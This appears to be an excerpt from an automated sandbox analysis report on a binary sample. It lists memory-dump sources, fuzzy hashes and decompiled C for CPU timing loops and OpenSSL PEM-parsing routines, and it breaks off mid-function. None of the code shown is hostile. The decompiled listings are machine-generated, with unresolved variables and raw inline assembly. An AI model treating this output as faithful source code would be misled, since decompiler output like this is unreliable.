                                                              • Instruction ID: 16e79e3586fdd6d70b80266423128bf68febed68c59d35d97b4c15bdbb0ff293
                                                              • Opcode Fuzzy Hash: aec08d149ecfa6be2b40e01b4dc94bad01a90ea383ffb5275a71a76fa15f278e
                                                              • Instruction Fuzzy Hash: D121CF221097C14BD731CE29C88466BBFE1EB86324F144AADD8C687A43D724AA0DC752
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BB605D, Relevance: .1, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c9f9df6a7e79ad2ab753228a9f3152c45f60fa4086fa6ce7dd1644e308b67909
                                                              • Instruction ID: 7abe2109b36cad11134414bc5ab031c16e62fc63544d187622d3db1aaca73acb
                                                              • Opcode Fuzzy Hash: c9f9df6a7e79ad2ab753228a9f3152c45f60fa4086fa6ce7dd1644e308b67909
                                                              • Instruction Fuzzy Hash: 451151D9C2AFB906E723633B5D42242DA105EF7989550D347FCB439D61F701B5C17210
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA3B00, Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 65%
                                                              			E00BA3B00(void* __eflags) {
				void* _t10;
				void* _t14;
				intOrPtr _t15;
				void* _t18;
				intOrPtr _t21;
				void* _t23;
				intOrPtr _t24;
				void* _t25;
				void* _t28;

				asm("bt dword [edx], 0x4");
				if(__eflags < 0) {
					asm("bt dword [edx], 0x13");
					if(__eflags < 0) {
						_t21 =  *((intOrPtr*)(_t25 + 0x14));
						_t15 =  *((intOrPtr*)(_t25 + 0x18));
						_t24 =  *((intOrPtr*)(_t25 + 0x1c));
						asm("rdtsc");
						asm("clflush [edi]");
						asm("lock add [edi], ebx");
						asm("rdtsc");
						_t10 = 0;
						_t23 = 0;
						_t14 = 0;
						while(1) {
							asm("clflush [edi]");
							asm("lock add [edi], eax");
							_t24 = _t24 - 1;
							if(_t24 == 0) {
								break;
							}
							asm("rdtsc");
							_t18 = _t10;
							_t10 = _t10 - _t23;
							_t23 = _t18;
							_t28 = _t10 - _t14;
							_t14 = _t10;
							_t15 = _t15;
							_t21 = _t21 + (0 | _t28 != 0x00000000) * 4;
							if(_t15 != 0) {
								continue;
							}
							break;
						}
						return  *((intOrPtr*)(_t25 + 0x18)) - _t15;
					}
				}
				return 0;
			}












                                                              0x00ba3b0f
                                                              0x00ba3b13
                                                              0x00ba3b19
                                                              0x00ba3b1d
                                                              0x00ba3b23
                                                              0x00ba3b27
                                                              0x00ba3b2b
                                                              0x00ba3b2f
                                                              0x00ba3b38
                                                              0x00ba3b3b
                                                              0x00ba3b3e
                                                              0x00ba3b42
                                                              0x00ba3b44
                                                              0x00ba3b46
                                                              0x00ba3b50
                                                              0x00ba3b50
                                                              0x00ba3b53
                                                              0x00ba3b56
                                                              0x00ba3b59
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba3b5f
                                                              0x00ba3b61
                                                              0x00ba3b63
                                                              0x00ba3b65
                                                              0x00ba3b67
                                                              0x00ba3b69
                                                              0x00ba3b73
                                                              0x00ba3b75
                                                              0x00ba3b78
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba3b78
                                                              0x00000000
                                                              0x00ba3b82
                                                              0x00ba3b1d
                                                              0x00ba3b88

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f0550ebba89f696a802c2f16187d6d713026bf2846b3f9db60b4efcf55009870
                                                              • Instruction ID: f6b5ce6c0a8e7bfba447b1773aad3ae9716480166863b2efbe19e7f1136bc039
                                                              • Opcode Fuzzy Hash: f0550ebba89f696a802c2f16187d6d713026bf2846b3f9db60b4efcf55009870
                                                              • Instruction Fuzzy Hash: 7501D1323083124FC700CD3D9940796FBE6EB9A764F5545B8F50AD3205D2619E1587A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA3A90, Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 54%
                                                              			E00BA3A90(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _t5;
				intOrPtr _t9;
				void* _t11;
				intOrPtr _t12;
				void* _t13;

				_t5 = 0;
				asm("bt dword [edx], 0x4");
				if(__eflags < 0) {
					asm("bt dword [edx], 0x13");
					if(__eflags < 0) {
						_t12 = _a4;
						_t9 = _a8;
						asm("rdtsc");
						_t13 = 0;
						asm("clflush [edi]");
						asm("lock add [edi], ebx");
						do {
							asm("rdtsc");
							_t11 = _t5;
							_t5 = _t5 - _t13;
							_t13 = _t11;
							asm("clflush [edi]");
							asm("lock add [edi], eax");
							_t12 = _t12 + 4;
							_t9 = _t9 - 1;
						} while (_t9 != 0);
						return _a8;
					}
				}
				return _t5;
			}








                                                              0x00ba3a94
                                                              0x00ba3a9f
                                                              0x00ba3aa3
                                                              0x00ba3aa9
                                                              0x00ba3aad
                                                              0x00ba3ab3
                                                              0x00ba3ab7
                                                              0x00ba3abb
                                                              0x00ba3abd
                                                              0x00ba3ac4
                                                              0x00ba3ac7
                                                              0x00ba3ad0
                                                              0x00ba3ad0
                                                              0x00ba3ad2
                                                              0x00ba3ad4
                                                              0x00ba3ad6
                                                              0x00ba3ada
                                                              0x00ba3add
                                                              0x00ba3ae0
                                                              0x00ba3ae3
                                                              0x00ba3ae3
                                                              0x00000000
                                                              0x00ba3aec
                                                              0x00ba3aad
                                                              0x00ba3af4

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b1e8de0d092bb2a1d152504b7e3771d14a70be1a5c8da64bc2aec14f0d4b365e
                                                              • Instruction ID: 30313b61bb2c9a7f1f45a9d04ff1e5fdcecc5823735f95d361c6c2568b63802b
                                                              • Opcode Fuzzy Hash: b1e8de0d092bb2a1d152504b7e3771d14a70be1a5c8da64bc2aec14f0d4b365e
                                                              • Instruction Fuzzy Hash: F8F0BE323083228FD300CE29E540796FBE8EBA6264F1105A5F08AD3205C3629E05CBD0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA3880, Relevance: .0, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 43%
                                                              			E00BA3880(void* __edx, void* __eflags) {
				signed int _t2;
				void* _t4;
				intOrPtr* _t9;
				signed int _t12;

				asm("bt dword [ecx], 0x4");
				if(__eflags >= 0) {
					L4:
					__eflags = 0;
					return 0;
				} else {
					_t2 = cs;
					_t12 = _t2 & 0x00000003;
					if(_t12 != 0) {
						goto L4;
					} else {
						asm("pushfd");
						_pop(_t4);
						asm("bt eax, 0x9");
						if(_t12 >= 0) {
							goto L4;
						} else {
							asm("rdtsc");
							_push(_t4);
							asm("hlt");
							asm("rdtsc");
							asm("sbb edx, [esp+0x4]");
							return _t4 -  *_t9;
						}
					}
				}
			}







                                                              0x00ba3886
                                                              0x00ba388a
                                                              0x00ba38bb
                                                              0x00ba38bd
                                                              0x00ba38bf
                                                              0x00ba3890
                                                              0x00ba3892
                                                              0x00ba3894
                                                              0x00ba3897
                                                              0x00000000
                                                              0x00ba389d
                                                              0x00ba389d
                                                              0x00ba389e
                                                              0x00ba389f
                                                              0x00ba38a3
                                                              0x00000000
                                                              0x00ba38a9
                                                              0x00ba38a9
                                                              0x00ba38ac
                                                              0x00ba38ad
                                                              0x00ba38ae
                                                              0x00ba38b3
                                                              0x00ba38ba
                                                              0x00ba38ba
                                                              0x00ba38a3
                                                              0x00ba3897

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e5f4ce83dc79ce3fc7c322a4edc6d660ae40aaf32b5d136653fda93746c8b115
                                                              • Instruction ID: d2c8dd6f36063e233300055ecfb4ed0977941b651ff932ede9dc6c3b57768098
                                                              • Opcode Fuzzy Hash: e5f4ce83dc79ce3fc7c322a4edc6d660ae40aaf32b5d136653fda93746c8b115
                                                              • Instruction Fuzzy Hash: 65D02B7A4040015BEA02CD34EC55C25B3D1F3F3B20F548DA4F045E2014D33DC61D8621
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BABE70, Relevance: 30.0, APIs: 10, Strings: 7, Instructions: 212COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 97%
                                                              			E00BABE70(void* __ebx, void* __ecx, void* __edi, char _a4, intOrPtr* _a8) {
				intOrPtr _t9;
				void* _t10;
				char* _t15;
				char* _t18;
				void* _t19;
				char* _t20;
				void* _t22;
				char* _t25;
				void* _t26;
				signed int _t27;
				intOrPtr _t50;
				char* _t55;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t68;
				void* _t69;
				void* _t70;
				char* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t78;

				_t53 = __edi;
				_t73 = _a8;
				_t60 = _a4;
				 *_t73 = 0;
				if(_t60 == 0) {
					L25:
					return 1;
				} else {
					_t9 =  *_t60;
					if(_t9 == 0 || _t9 == 0xa) {
						goto L25;
					} else {
						_t10 = E00C6B55B(__ecx, _t60, "Proc-Type:", 0xa);
						_t76 = _t75 + 0xc;
						if(_t10 == 0) {
							_t61 = _t60 + 0xa;
							_t62 = _t61 + E00C6DAD0(__ecx, _t61, " \t");
							_t77 = _t76 + 8;
							_t63 = _t62 + 1;
							__eflags =  *_t62 - 0x34;
							if( *_t62 != 0x34) {
								goto L5;
							} else {
								_t48 =  *_t63;
								_t64 = _t63 + 1;
								__eflags =  *_t63 - 0x2c;
								if( *_t63 != 0x2c) {
									goto L5;
								} else {
									_t65 = _t64 + E00C6DAD0(_t48, _t64, " \t");
									_t15 = E00C6B55B(_t48, _t65, "ENCRYPTED", 9);
									_t78 = _t77 + 0x14;
									__eflags = _t15;
									if(_t15 != 0) {
										L24:
										E00B98310(_t53, 9, 0x6b, 0x6a, "crypto\\pem\\pem_lib.c", 0x1ec);
										__eflags = 0;
										return 0;
									} else {
										_t66 = _t65 + 9;
										_t18 = E00C6DAD0(_t48, _t66, " \t\r\n");
										_t78 = _t78 + 8;
										__eflags = _t18;
										if(_t18 == 0) {
											goto L24;
										} else {
											_t19 = E00C6DAD0(_t48, _t66, " \t\r");
											_t68 = _t66 + _t19 + 1;
											__eflags =  *((intOrPtr*)(_t66 + _t19)) - 0xa;
											if( *((intOrPtr*)(_t66 + _t19)) == 0xa) {
												_t20 = E00C6B55B(_t48, _t68, "DEK-Info:", 9);
												__eflags = _t20;
												if(_t20 == 0) {
													_push(__edi);
													_t69 = _t68 + 9;
													_t70 = _t69 + E00C6DAD0(_t48, _t69, " \t");
													_t22 = E00C6DA80(_t48, _t70, " \t,");
													_t71 = _t70 + _t22;
													 *_t71 = 0;
													_t55 = E00BC0D50(_t70, _t70);
													 *_t73 = _t55;
													 *_t71 =  *((intOrPtr*)(_t70 + _t22));
													_t72 = _t71 + E00C6DAD0(_t48, _t71, " \t");
													_a4 = _t72;
													__eflags = _t55;
													if(_t55 != 0) {
														_t25 = E00B97400(_t55);
														__eflags = _t25;
														if(__eflags <= 0) {
															L20:
															if(__eflags != 0) {
																L23:
																_t26 = E00B97400(_t55);
																__eflags =  &_a4;
																_t27 = E00BAAC00(_t26,  &_a4,  &_a4);
																asm("sbb eax, eax");
																return  ~( ~_t27);
															} else {
																__eflags =  *_t72 - 0x2c;
																if( *_t72 != 0x2c) {
																	goto L23;
																} else {
																	E00B98310(_t55, 9, 0x6b, 0x82, "crypto\\pem\\pem_lib.c", 0x216);
																	__eflags = 0;
																	return 0;
																}
															}
														} else {
															_t50 =  *_t72;
															_t72 = _t72 + 1;
															_a4 = _t72;
															__eflags = _t50 - 0x2c;
															if(_t50 == 0x2c) {
																__eflags = _t25;
																goto L20;
															} else {
																E00B98310(_t55, 9, 0x6b, 0x81, "crypto\\pem\\pem_lib.c", 0x213);
																__eflags = 0;
																return 0;
															}
														}
													} else {
														E00B98310(_t55, 9, 0x6b, 0x72, "crypto\\pem\\pem_lib.c", 0x20e);
														__eflags = 0;
														return 0;
													}
												} else {
													E00B98310(__edi, 9, 0x6b, 0x69, "crypto\\pem\\pem_lib.c", 0x1fb);
													__eflags = 0;
													return 0;
												}
											} else {
												E00B98310(__edi, 9, 0x6b, 0x70, "crypto\\pem\\pem_lib.c", 0x1f2);
												__eflags = 0;
												return 0;
											}
										}
									}
								}
							}
						} else {
							E00B98310(__edi, 9, 0x6b, 0x6b, "crypto\\pem\\pem_lib.c", 0x1df);
							L5:
							return 0;
						}
					}
				}
			}
































                                                              0x00babe70
                                                              0x00babe71
                                                              0x00babe76
                                                              0x00babe7a
                                                              0x00babe83
                                                              0x00bac0a6
                                                              0x00bac0ac
                                                              0x00babe89
                                                              0x00babe89
                                                              0x00babe8d
                                                              0x00000000
                                                              0x00babe9b
                                                              0x00babea3
                                                              0x00babea8
                                                              0x00babead
                                                              0x00babecc
                                                              0x00babeda
                                                              0x00babede
                                                              0x00babee1
                                                              0x00babee2
                                                              0x00babee4
                                                              0x00000000
                                                              0x00babee6
                                                              0x00babee6
                                                              0x00babee8
                                                              0x00babee9
                                                              0x00babeec
                                                              0x00000000
                                                              0x00babeee
                                                              0x00babefb
                                                              0x00babf03
                                                              0x00babf08
                                                              0x00babf0b
                                                              0x00babf0d
                                                              0x00bac088
                                                              0x00bac098
                                                              0x00bac0a1
                                                              0x00bac0a4
                                                              0x00babf13
                                                              0x00babf13
                                                              0x00babf1c
                                                              0x00babf21
                                                              0x00babf24
                                                              0x00babf26
                                                              0x00000000
                                                              0x00babf2c
                                                              0x00babf32
                                                              0x00babf3f
                                                              0x00babf40
                                                              0x00babf43
                                                              0x00babf6a
                                                              0x00babf72
                                                              0x00babf74
                                                              0x00babf94
                                                              0x00babf95
                                                              0x00babfa3
                                                              0x00babfad
                                                              0x00babfb5
                                                              0x00babfb8
                                                              0x00babfc0
                                                              0x00babfc7
                                                              0x00babfcb
                                                              0x00babfd2
                                                              0x00babfd7
                                                              0x00babfdb
                                                              0x00babfdd
                                                              0x00babfff
                                                              0x00bac007
                                                              0x00bac009
                                                              0x00bac03b
                                                              0x00bac03b
                                                              0x00bac064
                                                              0x00bac065
                                                              0x00bac06a
                                                              0x00bac075
                                                              0x00bac081
                                                              0x00bac087
                                                              0x00bac03d
                                                              0x00bac03d
                                                              0x00bac040
                                                              0x00000000
                                                              0x00bac042
                                                              0x00bac055
                                                              0x00bac060
                                                              0x00bac063
                                                              0x00bac063
                                                              0x00bac040
                                                              0x00bac00b
                                                              0x00bac00b
                                                              0x00bac00d
                                                              0x00bac00e
                                                              0x00bac012
                                                              0x00bac015
                                                              0x00bac039
                                                              0x00000000
                                                              0x00bac017
                                                              0x00bac02a
                                                              0x00bac035
                                                              0x00bac038
                                                              0x00bac038
                                                              0x00bac015
                                                              0x00babfdf
                                                              0x00babfef
                                                              0x00babffa
                                                              0x00babffd
                                                              0x00babffd
                                                              0x00babf76
                                                              0x00babf86
                                                              0x00babf8f
                                                              0x00babf92
                                                              0x00babf92
                                                              0x00babf45
                                                              0x00babf55
                                                              0x00babf5e
                                                              0x00babf61
                                                              0x00babf61
                                                              0x00babf43
                                                              0x00babf26
                                                              0x00babf0d
                                                              0x00babeec
                                                              0x00babeaf
                                                              0x00babebf
                                                              0x00babec8
                                                              0x00babecb
                                                              0x00babecb
                                                              0x00babead
                                                              0x00babe8d

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _strspn$_strncmp
                                                              • String ID: $ $ ,$DEK-Info:$ENCRYPTED$Proc-Type:$crypto\pem\pem_lib.c
                                                              • API String ID: 2057175535-2412464277
                                                              • Opcode ID: fd59317f99ba71549130dbaab8ad80bddcbfc58bbbc39cc09c4011ae8a5d7947
                                                              • Instruction ID: da69d834d033c2972b1a2004810cd9db15081fe3d5c230a95a65c2d7e0d2bd04
                                                              • Opcode Fuzzy Hash: fd59317f99ba71549130dbaab8ad80bddcbfc58bbbc39cc09c4011ae8a5d7947
                                                              • Instruction Fuzzy Hash: EE51A8B6BCC71435F63135A86C43FAB66C88B52F18F0948B5FE4DE52C3F782495242A9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BAAF10, Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 446COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 62%
                                                              			E00BAAF10(void* __edi, void* __esi, void* __ebp, intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, char _a24, intOrPtr* _a28, intOrPtr* _a32, intOrPtr* _a36, intOrPtr* _a40, char _a44, char _a48, char _a57, char _a59, char _a302, signed int _a304, intOrPtr _a312, intOrPtr* _a316, intOrPtr* _a320, intOrPtr* _a324, intOrPtr* _a328) {
				char _v0;
				void* __ebx;
				signed int _t137;
				intOrPtr _t141;
				intOrPtr* _t144;
				intOrPtr _t150;
				void* _t152;
				void* _t154;
				void* _t155;
				intOrPtr* _t156;
				void* _t159;
				void* _t160;
				void* _t164;
				void* _t166;
				intOrPtr _t168;
				intOrPtr* _t169;
				void* _t171;
				void* _t173;
				void* _t174;
				intOrPtr _t176;
				void* _t177;
				void* _t179;
				intOrPtr _t181;
				void* _t188;
				char _t189;
				void* _t190;
				void* _t194;
				void* _t195;
				void* _t199;
				void* _t200;
				intOrPtr _t215;
				intOrPtr _t218;
				void* _t237;
				void* _t241;
				char _t256;
				void* _t257;
				intOrPtr* _t261;
				void* _t262;
				void* _t263;
				intOrPtr _t264;
				void* _t265;
				intOrPtr _t266;
				void* _t267;
				intOrPtr _t268;
				void* _t271;
				void* _t272;
				void* _t273;
				void* _t274;
				void* _t275;
				intOrPtr _t277;
				signed int _t278;
				signed int _t279;
				void* _t281;
				void* _t282;
				void* _t283;
				void* _t284;

				E00C6BB10(0x134);
				_t137 =  *0xcc5970; // 0x851ab4dd
				_a304 = _t137 ^ _t278;
				_t234 = _a324;
				_a36 = _a316;
				_t277 = _a312;
				_a28 = _a320;
				_a32 = _a324;
				_a40 = _a328;
				_t141 = E00BC03F0();
				_t208 = 0;
				_a16 = _t141;
				_a20 = 0;
				_v0 = 0;
				_a24 = 0;
				if(_t141 != 0) {
					_push(__esi);
					_push(__edi);
					_t256 = E00BA97E0(0, __edi);
					_a12 = _t256;
					_t261 = E00BA97E0(0, _t256);
					_a8 = _t261;
					_t144 = E00BA97E0(0, _t256);
					_a4 = _t144;
					if(_t256 == 0 || _t261 == 0 || _t144 == 0) {
						L63:
						E00BA9810(_t208, _t256, _t277, _a12);
						_t235 = _a8;
						E00BA9810(_t208, _t256, _t277, _a8);
						E00BA9810(_t208, _t256, _t277, _a4);
						E00BC0410(_a16);
						_t279 = _t278 + 0x10;
						_t150 = 0;
					} else {
						_t214 =  &_a48;
						_a302 = 0;
						_t152 = E00B95290(0, _t256, _t277, _t277,  &_a48, 0xfe);
						_t281 = _t278 + 0xc;
						if(_t152 <= 0) {
							L13:
							_push(0x2b3);
							_push("crypto\\pem\\pem_lib.c");
							_push(0x6c);
							goto L62;
						} else {
							do {
								while( *((char*)(_t281 + _t152 + 0x40)) <= 0x20) {
									_t152 = _t152 - 1;
									if(_t152 >= 0) {
										continue;
									}
									break;
								}
								_t154 = _t152 + 1;
								 *((char*)(_t281 + _t154 + 0x48)) = 0xa;
								 *((char*)(_t281 + _t154 + 0x4d)) = _t208;
								_t155 = E00C6B55B(_t214,  &_a48, "-----BEGIN ", 0xb);
								_t282 = _t281 + 0xc;
								if(_t155 != 0) {
									goto L12;
								} else {
									_t156 =  &_a59;
									_t237 = _t156 + 1;
									do {
										_t215 =  *_t156;
										_t156 = _t156 + 1;
									} while (_t215 != _t208);
									_t263 = _t156 - _t237;
									_t159 = E00C6B55B(_t215, _t282 + _t263 + 0x49, "-----\n", 6);
									_t282 = _t282 + 0xc;
									if(_t159 == 0) {
										_t160 = E00BA98C0(_t277, _t256, _t263 + 9);
										_t281 = _t282 + 8;
										if(_t160 != 0) {
											E00C6B7A0(_t208, _t256, _t263,  *((intOrPtr*)(_t256 + 4)),  &_a59, _t263 - 6);
											 *((char*)( *((intOrPtr*)(_t256 + 4)) + _t263 - 6)) = _t208;
											_t264 = _a8;
											_t256 = 0;
											_t164 = E00BA98C0(_t277, _t264, 0x100);
											_t281 = _t281 + 0x14;
											if(_t164 != 0) {
												 *((char*)( *((intOrPtr*)(_t264 + 4)))) = _t208;
												_t265 = E00B95290(_t208, 0, _t277, _t277,  &_a48, 0xfe);
												_t283 = _t281 + 0xc;
												if(_t265 <= _t208) {
													L28:
													_t266 = _a4;
													_v0 = _t208;
													_t166 = E00BA98C0(_t277, _t266, 0x400);
													_t281 = _t283 + 8;
													if(_t166 != 0) {
														 *((char*)( *((intOrPtr*)(_t266 + 4)))) = _t208;
														if(_a24 != _t208) {
															_t168 = _a8;
															_v0 = _t256;
															_a8 = _t266;
															_a4 = _t168;
															_t256 = _t168;
														} else {
															_t224 =  &_a48;
															_t271 = E00B95290(_t208, _t256, _t277, _t277,  &_a48, 0xfe);
															_t281 = _t281 + 0xc;
															if(_t271 <= _t208) {
																L49:
																_t256 = _a4;
															} else {
																do {
																	while( *((char*)(_t281 + _t271 + 0x40)) <= 0x20) {
																		_t271 = _t271 - 1;
																		if(_t271 >= 0) {
																			continue;
																		}
																		break;
																	}
																	_t272 = _t271 + 1;
																	 *((char*)(_t281 + _t272 + 0x40)) = 0xa;
																	_t273 = _t272 + 1;
																	 *((char*)(_t281 + _t273 + 0x40)) = _t208;
																	if(_t273 != 0x41) {
																		_a20 = 1;
																	}
																	_t188 = E00C6B55B(_t224,  &_a48, "-----END ", 9);
																	_t281 = _t281 + 0xc;
																	if(_t188 == 0 || _t273 > 0x41) {
																		goto L49;
																	} else {
																		_t189 = _v0;
																		_t256 = _a4;
																		_t78 = _t189 + 9; // 0xb
																		_t190 = E00BA99A0(_t277, _t256, _t273 + _t78);
																		_t281 = _t281 + 8;
																		if(_t190 == 0) {
																			_push(0x301);
																			_push("crypto\\pem\\pem_lib.c");
																			_push(0x41);
																			goto L62;
																		} else {
																			E00C6B7A0(_t208, _t256, _t273,  *((intOrPtr*)(_t256 + 4)) + _v0,  &_a48, _t273);
																			_t224 =  *((intOrPtr*)(_t256 + 4)) + _t273;
																			_t284 = _t281 + 0xc;
																			 *((char*)( *((intOrPtr*)(_t256 + 4)) + _t273 + _v0)) = _t208;
																			_v0 = _v0 + _t273;
																			_push(0xfe);
																			if(_a20 != _t208) {
																				_push( &_a48);
																				_push(_t277);
																				_a48 = _t208;
																				_t194 = E00B95290(_t208, _t256, _t277);
																				_t281 = _t284 + 0xc;
																				if(_t194 > _t208) {
																					while( *((char*)(_t281 + _t194 + 0x40)) <= 0x20) {
																						_t194 = _t194 - 1;
																						if(_t194 >= 0) {
																							continue;
																						}
																						break;
																					}
																					_t195 = _t194 + 1;
																					 *((char*)(_t281 + _t195 + 0x40)) = 0xa;
																					 *((char*)(_t281 + _t195 + 0x41)) = _t208;
																				}
																				L50:
																				_t277 = _a12;
																				_t169 = _a4;
																				_t241 = _t169 + 1;
																				do {
																					_t218 =  *_t169;
																					_t169 = _t169 + 1;
																				} while (_t218 != _t208);
																				_t267 = _t169 - _t241;
																				_t171 = E00C6B55B(_t218,  &_a48, "-----END ", 9);
																				_t281 = _t281 + 0xc;
																				if(_t171 != 0) {
																					L61:
																					_push(0x31f);
																					_push("crypto\\pem\\pem_lib.c");
																					_push(0x66);
																					goto L62;
																				} else {
																					_t219 = _a4;
																					_t173 = E00C6B55B(_a4, _a4,  &_a57, _t267);
																					_t281 = _t281 + 0xc;
																					if(_t173 != 0) {
																						goto L61;
																					} else {
																						_t174 = E00C6B55B(_t219, _t281 + _t267 + 0x4d, "-----\n", 6);
																						_t281 = _t281 + 0xc;
																						if(_t174 != 0) {
																							goto L61;
																						} else {
																							_t268 = _a16;
																							E00BC0540(_t268);
																							_t176 =  *((intOrPtr*)(_t256 + 4));
																							_push(_v0);
																							_push(_t176);
																							_push( &_v0);
																							_push(_t176);
																							_push(_t268);
																							_t177 = E00BC0890();
																							_t281 = _t281 + 0x18;
																							if(_t177 >= 0) {
